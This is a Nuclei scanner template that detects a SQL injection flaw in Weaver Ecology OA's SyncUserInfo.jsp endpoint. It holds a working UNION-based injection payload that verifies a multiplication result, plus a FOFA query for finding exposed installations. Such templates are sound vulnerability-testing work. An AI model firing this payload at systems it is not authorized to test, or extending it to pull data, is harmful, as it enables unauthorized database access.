nuclei-templates/vulnerabilities/weaver/ecology/ecology-syncuserinfo-sqli.yaml

31 lines
623 B
YAML

id: ecology-syncuserinfo-sqli
info:
name: Ecology Syncuserinfo Sqli
author: ritikchaddha
severity: high
reference:
- https://www.weaver.com.cn/
metadata:
fofa-query: app="泛微-协同办公OA"
tags: ecology,sqli
requests:
- method: GET
path:
- "{{BaseURL}}/mobile/plugin/SyncUserInfo.jsp?userIdentifiers=-1)union(select(3),null,null,null,null,null,str(98989*44313),null"
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- "4386499557"
- type: status
status:
- 200